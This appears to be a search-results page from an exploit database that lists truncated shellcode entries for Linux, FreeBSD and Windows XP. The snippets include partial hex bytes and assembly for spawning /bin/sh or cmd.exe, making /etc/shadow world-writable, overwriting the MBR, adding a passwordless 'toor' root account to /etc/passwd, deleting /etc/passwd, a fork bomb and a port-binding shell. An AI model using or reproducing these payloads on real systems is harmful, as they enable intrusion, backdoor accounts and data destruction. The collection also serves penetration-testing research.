3628 matches found
Windows Xp Home Edition SP2 English ( calc.exe ) 37 bytes
No description provided by source. / Windows Xp Home edition SP2 english calc.exe 37 bytes shellcode by: Hazem mofeed Aka Hakxer penetration testing labs www.pentestlabs.com / char evil = "\xeb\x16\x5b\x31\xc0\x50\x53\xbb\x8d\x15\x86\x7c\xff\xd3\x31\xc0"...
Linux x86 - execve /bin/sh - 21 bytes
Linux x86 - execve /bin/sh - 21 bytes. Shellcode exploit for linx86 platform / execve /bin/sh - x86/linux - 21 bytes . zeroed argv / envp [email protected] [email protected] thanks : ivan, milo, oldschool crew / int main char sc = "\x6a\x0b" // push byte +0xb "\x58" //...
linux/x86 - /bin/sh 8 bytes
Exploit for linux/x86 platform in category shellcode =========================== linux/x86 - /bin/sh 8 bytes =========================== / 08048334 : 8048334: 99 cltd 8048335: 6a 0b push $0xb 8048337: 58 pop %eax 8048338: 60 pusha 8048339: 59 pop %ecx 804833a: cd 80 int $0x80 using this code...
Linux x86 - /bin/sh 8 bytes
Linux x86 - /bin/sh 8 bytes. Shellcode exploit for linx86 platform / 08048334 : 8048334: 99 cltd 8048335: 6a 0b push $0xb 8048337: 58 pop %eax 8048338: 60 pusha 8048339: 59 pop %ecx 804833a: cd 80 int $0x80 using this code. step1. This code is compiled. step2. strace -x output binary step3. get...
Win32 Shellcode (cmd.exe) for XP SP3 English 26 Bytes
Exploit for win32 platform in category shellcode ===================================================== Win32 Shellcode cmd.exe for XP SP3 English 26 Bytes ===================================================== / 26 Bytes Win32 Shellcode cmd.exe for XP SP3 English Author: Hellcode Research || TCC T...
linux/x86 - pacman -R - 59 bytes
Exploit for linux/x86 platform in category shellcode ================================== Linux i686 - pacman -R - 59 bytes ================================== / Title : Linux i686 - pacman -R - 59 bytes Author : Jonathan Salwan Pacman is a software package manager, developed as part of the Arch Lin...
win32 Shellcode XP SP2 FR (calc) 19 bytes
Exploit for win32 platform in category shellcode ========================================= Win32 Shellcode XP SP2 FR calc 19 bytes ========================================= / Author: SkuLL-HacKeR // Win32 Shellcode Collection calc 19 bytes // Shellcode Exec Calc.exe // Tested on XP SP2 FR include...
Win32 Shellcode XP SP2 FR calc 19 bytes
Win32 Shellcode XP SP2 FR calc 19 bytes. Shellcode exploit for win32 platform / Author: SkuLL-HacKeR Big Thx To : my brothers : Pr0F.SELLiM - ThE X-HaCkEr - Jiko - My friends in Morocco H0ME : Geeksec.com & No-exploiT Email : [email protected] & [email protected] // Win32 Shellcode Collection ca...
openSUSE Security Update : postgresql (postgresql-1773)
An unprivileged, authenticated PostgreSQL user could create a table which references functions with malicious content. Maintenance operations carried out be the database superuser could execute such functions CVE-2009-4136. Embedded null bytes in the common name of SSL certificates could bypass...
linux/x86 chmod 666 /etc/shadow 27 bytes
linux/x86 chmod 666 /etc/shadow 27 bytes. Shellcode exploit for linx86 platform ; linux/x86 chmod 666 /etc/shadow 27 bytes ; root@thegibson ; 2010-01-15 section .text global start start: ; chmod"//etc/shadow", 0666; mov al, 15 cdq push edx push dword 0x776f6461 push dword 0x68732f63 push dword...
linux/x86 chmod 666 /etc/shadow 27 bytes
Exploit for linux/x86 platform in category shellcode ======================================== linux/x86 chmod 666 /etc/shadow 27 bytes ======================================== ; linux/x86 chmod 666 /etc/shadow 27 bytes ; email protected ; 2010-01-15 section .text global start start: ;...
linux/x86 overwrite MBR on /dev/sda with `LOL!` 43 bytes
Exploit for linux/x86 platform in category shellcode ======================================================== linux/x86 overwrite MBR on /dev/sda with LOL! 43 bytes ======================================================== ; linux/x86 overwrite MBR on /dev/sda with LOL! 43 bytes section .text glob...
Windows XP Pro Sp2 English "Wordpad" Shellcode
No description provided by source. view source print? +-------------------------------------------------+ | Windows XP Pro Sp2 English "Wordpad" Shellcode. | +-------------------------------------------------+ Size : 12 Bytes,Null Free. Author : Aodrulez. Email : [email protected] Milw0rm :...
win32/xp Pro Sp2 English "Wordpad" Shellcode
Exploit for win32 platform in category shellcode ============================================ win32/xp Pro Sp2 English "Wordpad" Shellcode ============================================ +-------------------------------------------------+ | Windows XP Pro Sp2 English "Wordpad" Shellcode. |...
linux/x86 append "/etc/passwd" & exit 107 bytes
linux/x86 append "/etc/passwd" & exit 107 bytes. Shellcode exploit for linx86 platform / appendpasswd.c Payload: Adds the string: toor::0:0:t00r:/root:/bin/bash to /etc/passwd thereby adding a password-less root account with login name "toor" Platform: linux/x86 Size: 107 bytes Author: $andman / ...
linux/x86 break chroot 87 bytes
Exploit for linux/x86 platform in category shellcode =============================== linux/x86 break chroot 87 bytes =============================== bt:/ ./pwn perl -e 'print "\x90"x181...
linux/x86 fork bomb 6 bytes
linux/x86 fork bomb 6 bytes. Shellcode exploit for linx86 platform Smallest fork bomb shellcode I could make. ; linux/x86 fork bomb 6 bytes ; root@thegibson ; 2009-12-30 section .text global start start: ; fork mov al, 2 int 0x80 jmp short start...
freebsd/x86 portbind shellcode 167 bytes
No description provided by source. /- Copyright c 2009, Sofian Brabez [email protected] freebsd-x86-portbind.c - FreeBSD x86 portbind a shell /bin/sh on 1337 \x05\x39 167 bytes / const char shellcode = "\x6a\x00" // push $0x0 "\x6a\x01" // push $0x1 "\x6a\x02" // push $0x2 "\x50" // push %eax "\x6a\x6...
linux/x86 unlink(/etc/passwd) & exit() 35 bytes
No description provided by source. Title: linux/x86 unlink/etc/passwd & exit 35 bytes Date: 2009-12-24 Author: sandman, n4mdn4s 4T gmail D0T com Tested on: linux/Fedora 12 Code : / unlinkpasswd.c Platform: linux/x86 Size: 35 bytes Author: $andman / include string.h include stdio.h char shell =...
win32/xp sp2 (En + Ar) cmd.exe 23 bytes
No description provided by source. / win32/xp sp2 En + Ar cmd.exe 23 bytes Author : AnTi SeCuRe TeaM : SauDi ViRuS TeaM Email : [email protected] Site : WwW.VxX9.Cc Thx To : Stack , SauDi ViRuS TeaM RENO - Dr.php - ! BaD BoY ! - Jetli007 - Gov.hacker Description : It's a 23 Byte Shellcode...